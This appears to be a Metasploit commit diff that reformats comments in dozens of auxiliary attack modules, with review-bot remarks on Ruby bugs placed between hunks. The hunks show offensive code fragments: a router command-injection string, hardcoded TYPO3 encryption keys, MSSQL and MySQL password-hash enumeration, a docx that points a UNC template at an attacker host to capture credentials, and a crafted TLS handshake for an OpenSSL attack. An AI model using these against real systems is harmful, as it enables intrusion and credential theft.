
yard doc and comment corrections for auxiliary

This commit is contained in:
root 2015-04-03 16:12:23 +05:00
parent 0dd987d873
commit 4bd40fed7f
129 changed files with 476 additions and 590 deletions


@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#check to see if we get HTTP OK
# check to see if we get HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
else
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Check to verify server reported is a 2wire router
# Check to verify server reported is a 2wire router
if (res.headers['Server'].match(/2wire Gateway/i))
print_status("Server is a 2wire Gateway! Grabbing info\n")
else
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Hardware Version: #{hardware}")
end
#Check the Software Version
# Check the Software Version
if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
ver = $1
print_status("Software version: #{ver}")
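Review bot: `res.headers['Server'].match(/2wire Gateway/i)` raises NoMethodError when the response has no Server header, because `nil` has no `match`; the `res.code == 200` check above it does not guarantee the header is present. The nil-safe spelling `if res.headers['Server'] =~ /2wire Gateway/i` (or `.to_s.match`) lets a missing header fall into the existing else branch instead of aborting the module. The enclosing method begins before the first hunk and continues past the last one shown.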


@ -71,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
cmd = datastore['CMD']
#original post request:
#data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
#action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
# original post request:
# data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
# action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
begin


@ -20,8 +20,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'Craig Heffner', #vulnerability discovery and original exploit
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
'Craig Heffner', # vulnerability discovery and original exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>


@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
return false
end
when 302
#Success!
# Success!
return true
else
print_error("ERROR: received code #{res.code}")


@ -100,20 +100,20 @@ class Metasploit4 < Msf::Auxiliary
else
print_status("Rotating through known encryption keys")
encryption_keys = [
#TYPO3 4.3.x - 4.4.x
# TYPO3 4.3.x - 4.4.x
'd696ab49a803d7816021cb1768a6917d',
'47d1e990583c9c67424d369f3414728e6793d9dc2ae3429d488a7374bc85d2a0b19b62de67d46a6079a75f10934288d3',
'7b13b2203029ed80337f27127a9f1d28c2597f4c08c9a07b782b674731ecf5328c4d900851957899acdc6d4f911bf8b7',
#TYPO3 4.4.7+
# TYPO3 4.4.7+
'fbbdebd9091d914b3cd523485afe7b03e6006ade4125e4cf4c46195b3cecbb9ae0fe0f7b5a9e72ea2ac5f17b66f5abc7',
#TYPO3 4.5.0
# TYPO3 4.5.0
'def76f1d8139304b7edea83b5f40201088ba70b20feabd8b2a647c4e71774b7b0e4086e4039abaf5d4f6a521f922e8a2',
'bac0112e14971f00431639342415ff22c3c3bf270f94175b8741c0fa95df244afb61e483c2facf63cffc320ed61f2731',
#TYPO3 4.5.2
# TYPO3 4.5.2
'14b1225e2c277d55f54d18665791f114f4244f381113094e2a19dfb680335d842e10460995eb653d105a562a5415d9c7',
#TYPO3 4.5.3
# TYPO3 4.5.3
'5d4eede80d5cec8df159fd869ec6d4041cd2fc0136896458735f8081d4df5c22bbb0665ddac56056023e01fbd4ab5283',
#TYPO3 4.5.4 - 4.5.7
# TYPO3 4.5.4 - 4.5.7
'b2aae63def4c512ce8f4386e57b8a48b40312de30775535cbff60a6eab356809a0b596edaad49c725d9963d93aa2ffae',
]
end


@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
def run
connect
#Grab the MaxDB info.
# Grab the MaxDB info.
pdbmsrv = "\x5A\x00\x00\x00\x03\x5B\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF"
pdbmsrv << "\x00\x00\x04\x00\x5A\x00\x00\x00\x00\x02\x42\x00\x04\x09\x00\x00"
pdbmsrv << "\x00\x40\x00\x00\xD0\x3F\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
print_status(info)
end
#Send our command.
# Send our command.
len = 39 + datastore['CMD'].length
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
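Review bot: `len = 39 + datastore['CMD'].length` is packed into a single byte via `len.chr`, which raises RangeError for any value above 255, so a CMD longer than 216 bytes crashes the module with a Ruby exception rather than a clear error (and could not be expressed in the one-byte wire field anyway). Guard it before building the packet, e.g. `if datastore['CMD'].bytesize > 216` then `print_error('CMD must be at most 216 bytes'); return`. `bytesize` rather than `length` is the safer measure if CMD may contain non-ASCII characters, since the protocol field counts bytes. The enclosing run method continues beyond this hunk.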


@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' =>
[
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', #Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' #Msf module
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
],
'References' =>
[
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
unless length == data.length
vprint_warning("#{peer} - Inconsistent length / data packet")
#return nil
# return nil
end
return { :length => length, :data => data }


@ -48,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary
:type => 'MSSQL_ENUM',
:data => "Version: #{sqlversion}")
#-------------------------------------------------------
#Check Configuration Parameters and check what is enabled
#---------------------------------------------------------
# Check Configuration Parameters and check what is enabled
print_status("Configuration Parameters:")
if vernum.join != "2000"
query = "SELECT name, CAST(value_in_use AS INT) from sys.configurations"
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
sysconfig[l[0].strip] = l[1].to_i
end
else
#enable advanced options
# enable advanced options
mssql_query("EXEC sp_configure \'show advanced options\', 1; RECONFIGURE")[:rows]
query = "EXECUTE sp_configure"
ver = mssql_query(query)[:rows]
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#checking for C2 Audit Mode
# checking for C2 Audit Mode
if sysconfig['c2 audit mode'] == 1
print_status("\tC2 Audit Mode is Enabled")
report_note(:host => datastore['RHOST'],
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if xp_cmdshell is enabled
# check if xp_cmdshell is enabled
if vernum.join != "2000"
if sysconfig['xp_cmdshell'] == 1
print_status("\txp_cmdshell is Enabled")
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if remote access is enabled
# check if remote access is enabled
if sysconfig['remote access'] == 1
print_status("\tremote access is Enabled")
report_note(:host => datastore['RHOST'],
@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if Mail stored procedures are enabled
# check if Mail stored procedures are enabled
if vernum.join != "2000"
if sysconfig['Database Mail XPs'] == 1
print_status("\tDatabase Mail XPs is Enabled")
@ -199,7 +199,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if OLE stored procedures are enabled
# check if OLE stored procedures are enabled
if vernum.join != "2000"
if sysconfig['Ole Automation Procedures'] == 1
print_status("\tOle Automation Procedures are Enabled")
@ -451,7 +451,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for local accounts with same username as password
# Check for local accounts with same username as password
sameasuser = []
if vernum.join != "2000"
sameasuser = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(name, password_hash\) = 1")[:rows]
@ -479,7 +479,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for local accounts with empty password
# Check for local accounts with empty password
blankpass = []
if vernum.join != "2000"
blankpass = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(\'\', password_hash\) = 1")[:rows]
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for dangerous stored procedures
# Check for dangerous stored procedures
fountsp = []
dangeroussp = [
'sp_createorphan',
@ -732,7 +732,7 @@ EOS
end
#-------------------------------------------------------
#Enumerate Instances
# Enumerate Instances
instances =[]
if vernum.join != "2000"
querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'"
@ -769,7 +769,7 @@ EOS
end
#---------------------------------------------------------
#Enumerate under what accounts the instance services are running under
# Enumerate under what accounts the instance services are running under
print_status("Default Server Instance SQL Server Service is running under the privilege of:")
privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
if privdflt != nil


@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#Parse results
# Parse results
parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
if parsed_result && !parsed_result.empty?
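Review bot: `res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)` interpolates `clue_start` and `clue_end` directly into a regular expression, so any metacharacter in them (`.`, `(`, `[`, `?`, `*`) alters the match or raises RegexpError at runtime. Unless they are deliberately patterns, the safe form is `/#{Regexp.escape(clue_start)}(.*?)#{Regexp.escape(clue_end)}/m`. Where these values originate is outside this hunk, as is the rest of the enclosing method, so this may be intentional if they are already regex fragments.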


@ -53,12 +53,12 @@ class Metasploit3 < Msf::Auxiliary
def sql_statement()
#DEFINED HEADER TEXT
# DEFINED HEADER TEXT
headings = [
["Server","Database", "Schema", "Table", "Column", "Data Type", "Sample Data","Row Count"]
]
#DEFINE SEARCH QUERY AS VARIABLE
# DEFINE SEARCH QUERY AS VARIABLE
sql = "
-- CHECK IF VERSION IS COMPATABLE = > than 2000
IF (SELECT SUBSTRING(CAST(SERVERPROPERTY('ProductVersion') as VARCHAR), 1,
@ -341,11 +341,11 @@ class Metasploit3 < Msf::Auxiliary
#STATUSING
# STATUSING
print_line(" ")
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
#CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
begin
result = mssql_query(sql, false) if mssql_login_datastore
column_data = result[:rows]
@ -355,14 +355,14 @@ class Metasploit3 < Msf::Auxiliary
return
end
#CREATE TABLE TO STORE SQL SERVER DATA LOOT
# CREATE TABLE TO STORE SQL SERVER DATA LOOT
sql_data_tbl = Rex::Ui::Text::Table.new(
'Header' => 'SQL Server Data',
'Indent' => 1,
'Columns' => ['Server', 'Database', 'Schema', 'Table', 'Column', 'Data Type', 'Sample Data', 'Row Count']
)
#STATUSING
# STATUSING
print_status("Attempting to retrieve data ...")
if (column_data.count < 7)
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(" ")
end
#SETUP ROW WIDTHS
# SETUP ROW WIDTHS
widths = [0, 0, 0, 0, 0, 0, 0, 0]
(column_data|headings).each { |row|
0.upto(7) { |col|
@ -394,7 +394,7 @@ class Metasploit3 < Msf::Auxiliary
}
}
#PRINT HEADERS
# PRINT HEADERS
buffer1 = ""
buffer2 = ""
headings.each { |row|
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
buffer2 = buffer2.chomp(",")+ "\n"
}
#PRINT DIVIDERS
# PRINT DIVIDERS
buffer1 = ""
buffer2 = ""
headings.each { |row|
@ -417,7 +417,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(buffer1)
}
#PRINT DATA
# PRINT DATA
buffer1 = ""
buffer2 = ""
print_line("")
@ -429,7 +429,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(buffer1)
buffer2 = buffer2.chomp(",")+ "\n"
#WRITE QUERY OUTPUT TO TEMP REPORT TABLE
# WRITE QUERY OUTPUT TO TEMP REPORT TABLE
sql_data_tbl << [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]]
buffer1 = ""
@ -448,7 +448,7 @@ class Metasploit3 < Msf::Auxiliary
)
end
#CONVERT TABLE TO CSV AND WRITE TO FILE
# CONVERT TABLE TO CSV AND WRITE TO FILE
if (save_loot=="yes")
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlserver_query_results.csv"
path = store_loot("mssql.data", "text/plain", datastore['RHOST'], sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)


@ -32,11 +32,11 @@ class Metasploit3 < Msf::Auxiliary
print_status("Running MySQL Enumerator...")
print_status("Enumerating Parameters")
#-------------------------------------------------------
#getting all variables
# getting all variables
vparm = {}
res = mysql_query("show variables") || []
res.each do |row|
#print_status(" | #{row.join(" | ")} |")
# print_status(" | #{row.join(" | ")} |")
vparm[row[0]] = row[1]
end
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
query = "use mysql"
mysql_query(query)
#Account Enumeration
# Account Enumeration
# Enumerate all accounts with their password hashes
print_status("Enumerating Accounts:")
query = "select user, host, password from mysql.user"


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
begin
print_status("Sending statement: '#{query}'...")
result = prepare_exec(query)
#Need this if 'cause some statements won't return anything
# Need this if statement because some statements won't return anything
if result
result.each do |line|
print_status(line)


@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
return if not check_dependencies
begin
#Get all values from v$parameter
# Get all values from v$parameter
query = 'select name,value from v$parameter'
vparm = {}
params = prepare_exec(query)
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Running Oracle Enumeration....")
#Version Check
# Version Check
query = 'select * from v$version'
ver = prepare_exec(query)
print_status("The versions of the Components are:")
@ -64,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
)
end
#Saving Major Release Number for other checks
# Saving Major Release Number for other checks
majorrel = ver[0].scan(/Edition Release (\d*)./)
#-------------------------------------------------------
#Audit Check
# Audit Check
print_status("Auditing:")
begin
if vparm["audit_trail"] == "NONE"
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Security Settings
# Security Settings
print_status("Security Settings:")
begin
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Password Policy
# Password Policy
print_status("Password Policy:")
begin
query = %Q|


@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
end
#check if our process is done using these files
# check if our process is done using these files
def exclusive_access(*files)
simple.connect("\\\\#{@ip}\\#{@smbshare}")
files.each do |file|


@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
@smbshare = datastore['SMBSHARE']
# Try and connect
if connect
#Try and authenticate with given credentials
# Try and authenticate with given credentials
begin
smb_login
rescue StandardError => autherror


@ -64,10 +64,10 @@ class Metasploit3 < Msf::Auxiliary
n = 0
c = 0
#puts "body is #{res.body.length} bytes"
# puts "body is #{res.body.length} bytes"
infos = res.body.split(/\r?\n/)
infos.each do |row|
#puts row.inspect
# puts row.inspect
if (c < 6)
if (row.match(/\["file"\]=>/))
c+=1


@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"


@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"


@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
@formats = Set.new
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"


@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"


@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
hash_list = hash_file
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close


@ -49,29 +49,29 @@ class Metasploit3 < Msf::Auxiliary
bnatmac = arp2(bnatip,outint)
print_line("Obtained BNAT MAC: #{bnatmac}\n\n")
#Create Interface Specific Configs
# Create Interface Specific Configs
outconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{outint}").config
inconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{inint}").config
#Set Captures for Traffic coming from Outside and from Inside respectively
# Set Captures for Traffic coming from Outside and from Inside respectively
outpcap = PacketFu::Capture.new( :iface => "#{outint}", :start => true, :filter => "tcp and src #{bnatip}" )
print_line("Now listening on #{outint}...")
inpcap = PacketFu::Capture.new( :iface => "#{inint}", :start => true, :filter => "tcp and src #{clientip} and dst #{serverip}" )
print_line("Now listening on #{inint}...\n\n")
#Start Thread from Outside Processing
# Start Thread from Outside Processing
fromout = Thread.new do
loop do
outpcap.stream.each do |pkt|
packet = PacketFu::Packet.parse(pkt)
#Build a shell packet that will never hit the wire as a hack to get desired mac's
# Build a shell packet that will never hit the wire as a hack to get desired mac's
shell_pkt = PacketFu::TCPPacket.new(:config => inconfig, :timeout => 0.1, :flavor => "Windows")
shell_pkt.ip_daddr = clientip
shell_pkt.recalc
#Mangle Received Packet and Drop on the Wire
# Mangle Received Packet and Drop on the Wire
packet.ip_saddr = serverip
packet.ip_daddr = clientip
packet.eth_saddr = shell_pkt.eth_saddr
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Start Thread from Inside Processing
# Start Thread from Inside Processing
fromin = Thread.new do
loop do
inpcap.stream.each do |pkt|
@ -98,19 +98,19 @@ class Metasploit3 < Msf::Auxiliary
packet.eth_daddr = bnatmac
end
#Build a shell packet that will never hit the wire as a hack to get desired mac's
# Build a shell packet that will never hit the wire as a hack to get desired mac's
shell_pkt = PacketFu::TCPPacket.new(:config=>outconfig, :timeout=> 0.1, :flavor=>"Windows")
shell_pkt.ip_daddr = serverip
shell_pkt.recalc
#Mangle Received Packet and Drop on the Wire
# Mangle Received Packet and Drop on the Wire
packet.eth_saddr = shell_pkt.eth_saddr
packet.ip_saddr=shell_pkt.ip_saddr
packet.recalc
inj = PacketFu::Inject.new( :iface => "#{outint}", :config =>outconfig )
inj.a2w(:array => [packet.to_s])
#Trigger Cisco SPI Vulnerability by Double-tapping the SYN
# Trigger Cisco SPI Vulnerability by Double-tapping the SYN
if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0
select(nil, nil, nil, 0.75)
inj.a2w(:array => [packet.to_s])


@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
#here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
# here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
def make_new_file
metadata_file_data = ""
metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties"
@ -65,12 +65,12 @@ class Metasploit3 < Msf::Auxiliary
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">"
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>"
#where to find the skeleton files required for creating an empty document
# where to find the skeleton files required for creating an empty document
data_dir = File.join(Msf::Config.data_directory, "exploits", "docx")
zip_data = {}
#add skeleton files
# add skeleton files
vprint_status("Adding skeleton files from #{data_dir}")
Dir["#{data_dir}/**/**"].each do |file|
if not File.directory?(file)
@ -78,19 +78,19 @@ class Metasploit3 < Msf::Auxiliary
end
end
#add on-the-fly created documents
# add on-the-fly created documents
vprint_status("Adding injected files")
zip_data["docProps/core.xml"] = metadata_file_data
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
#add the otherwise skipped "hidden" file
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
#and lets create the file
# and lets create the file
zip_docx(zip_data)
end
#here we inject an UNC path into an existing file, and store the injected file in FILENAME
# here we inject an UNC path into an existing file, and store the injected file in FILENAME
def manipulate_file
ref = "<w:attachedTemplate r:id=\"rId1\"/>"
@ -99,24 +99,24 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#lets extract our docx and store it in memory
# lets extract our docx and store it in memory
zip_data = unzip_docx
#file to check for reference file we need
# file to check for reference file we need
file_content = zip_data["word/settings.xml"]
if file_content.nil?
print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
return nil
end
#if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
# if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?
vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)")
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
# lets zip the end result
zip_docx(zip_data)
else
#now insert the reference to the file that will enable our malicious entry
# now insert the reference to the file that will enable our malicious entry
insert_one = file_content.index("<w:defaultTabStop")
if insert_one.nil?
@ -135,16 +135,16 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#update the files that contain the injection and reference
# update the files that contain the injection and reference
zip_data["word/settings.xml"] = file_content
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
#lets zip the file
# lets zip the file
zip_docx(zip_data)
end
return 0
end
#making the actual docx from the hash
# making the actual docx from the hash
def zip_docx(zip_data)
docx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
@ -153,11 +153,11 @@ class Metasploit3 < Msf::Auxiliary
file_create(docx.pack)
end
#unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
# unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
def unzip_docx
#Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
# Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
vprint_status("Extracting #{datastore['SOURCE']} into memory.")
#we read it all into memory
# we read it all into memory
zip_data = Hash.new
begin
Zip::File.open(datastore['SOURCE']) do |filezip|
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
def run
#we need this in make_new_file and manipulate_file
# we need this in make_new_file and manipulate_file
@rels_file_data = ""
@rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp
@rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp
@ -182,11 +182,11 @@ class Metasploit3 < Msf::Auxiliary
@rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>"
if "#{datastore['SOURCE']}" == ""
#make an empty file
# make an empty file
print_status("Creating empty document that points to #{datastore['LHOST']}.")
make_new_file
else
#extract the word/settings.xml and edit in the reference we need
# extract the word/settings.xml and edit in the reference we need
print_status("Injecting UNC path into existing document.")
if manipulate_file.nil?
print_error("Failed to create a document from #{datastore['SOURCE']}.")


@ -58,8 +58,8 @@ class Metasploit4 < Msf::Auxiliary
}
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
# This should be rewritten with 1.upto() or Enumerable#each or
# something
# This should be rewritten with 1.upto() or Enumerable#each or
# something
for x in 1..datastore['RLIMIT']
print_status("Sending request #{x} to #{peer}")
begin
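Review bot: The hunk only re-indents the XXX note that asks for the `for` loop to be rewritten; since the comment is being edited anyway, it would be cleaner to apply it and drop the note: `1.upto(datastore['RLIMIT']) do |x|` with a matching `end`, which also stops `x` leaking into the enclosing scope the way `for` does. The loop body and its `begin` block continue past the end of this hunk.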


@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'Steve Jones', #original discoverer
'Hoagie <andi[at]void.at>', #original public exploit
'Paulino Calderon <calderon[at]websec.mx>', #metasploit module
'Steve Jones', # original discoverer
'Hoagie <andi[at]void.at>', # original public exploit
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
],
'License' => MSF_LICENSE,
'References' =>


@ -51,9 +51,9 @@ class Metasploit3 < Msf::Auxiliary
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Mac OS X: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
stub = lsa_open_policy(dcerpc)
stub << NDR.long(1)


@ -42,32 +42,32 @@ class Metasploit4 < Msf::Auxiliary
def run
# Client Hello
p1 = "\x16" # Content Type: Handshake
p1 = "\x16" # Content Type: Handshake
p1 << "\x03\x01" # Version: TLS 1.0
p1 << "\x00\x7e" # Length: 126
p1 << "\x01" # Handshake Type: Client Hello
p1 << "\x01" # Handshake Type: Client Hello
p1 << "\x00\x00\x7a" # Length: 122
p1 << "\x03\x02" # Version: TLS 1.1
p1 << ("A" * 32) # Random
p1 << "\x00" # Session ID Length: 0
p1 << "\x00" # Session ID Length: 0
p1 << "\x00\x08" # Cypher Suites Length: 6
p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA
p1 << "\x00\x39" # - DHE-RSA-AES256-SHA
p1 << "\x00\x35" # - AES256-SHA
p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV
p1 << "\x01" # Compression Methods Length: 1
p1 << "\x00" # - NULL-Compression
p1 << "\x01" # Compression Methods Length: 1
p1 << "\x00" # - NULL-Compression
p1 << "\x00\x49" # Extensions Length: 73
p1 << "\x00\x0b" # - Extension: ec_point_formats
p1 << "\x00\x04" # Length: 4
p1 << "\x03" # EC Points Format Length: 3
p1 << "\x00" # - uncompressed
p1 << "\x01" # - ansiX962_compressed_prime
p1 << "\x02" # - ansiX962_compressed_char2
p1 << "\x03" # EC Points Format Length: 3
p1 << "\x00" # - uncompressed
p1 << "\x01" # - ansiX962_compressed_prime
p1 << "\x02" # - ansiX962_compressed_char2
p1 << "\x00\x0a" # - Extension: elliptic_curves
p1 << "\x00\x34" # Length: 52
p1 << "\x00\x32" # Elliptic Curves Length: 50
# 25 Elliptic curves:
# 25 Elliptic curves:
p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
@ -77,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary
p1 << "\x00\x00" # Length: 0
p1 << "\x00\x0f" # - Extension: Heartbeat
p1 << "\x00\x01" # Length: 1
p1 << "\x01" # Peer allowed to send requests
p1 << "\x01" # Peer allowed to send requests
# Change Cipher Spec Message
@ -97,12 +97,12 @@ class Metasploit4 < Msf::Auxiliary
# Client Key Exchange, Change Cipher Spec, Encrypted Handshake
# AES256-SHA
p2_aes_sha = "\x16" # Content Type: Handshake
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
p2_aes_sha << "\x01\x06" # Length: 262
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
p2_aes_sha << "\x01\x06" # Length: 262
p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange
p2_aes_sha << "\x00\x01\x02" # Length: 258
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
p2_aes_sha << "\x00\x01\x02" # Length: 258
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
p2_aes_sha << p2_cssm # Change Cipher Spec Message
p2_aes_sha << p2_ehm # Encrypted Handshake Message
@ -112,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary
p2_dhe << "\x03\x02" # Version: TLS 1.1
p2_dhe << "\x00\x46" # Length: 70
p2_dhe << "\x10" # Handshake Type: Client Key Exchange
p2_dhe << "\x00\x00\x42" # Length: 66
p2_dhe << "\x00\x00\x42" # Length: 66
p2_dhe << "\x00\x40" # DH Pubkey Length: 64
p2_dhe << ("A" * 64) # DH Pubkey
p2_dhe << p2_cssm # Change Cipher Spec Message
@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary
p2_ecdhe << "\x03\x02" # Version: TLS 1.1
p2_ecdhe << "\x00\x46" # Length: 70
p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange
p2_ecdhe << "\x00\x00\x42" # Length: 66
p2_ecdhe << "\x00\x00\x42" # Length: 66
p2_ecdhe << "\x41" # EC DH Pubkey Length: 65
# EC DH Pubkey:
# EC DH Pubkey:
p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
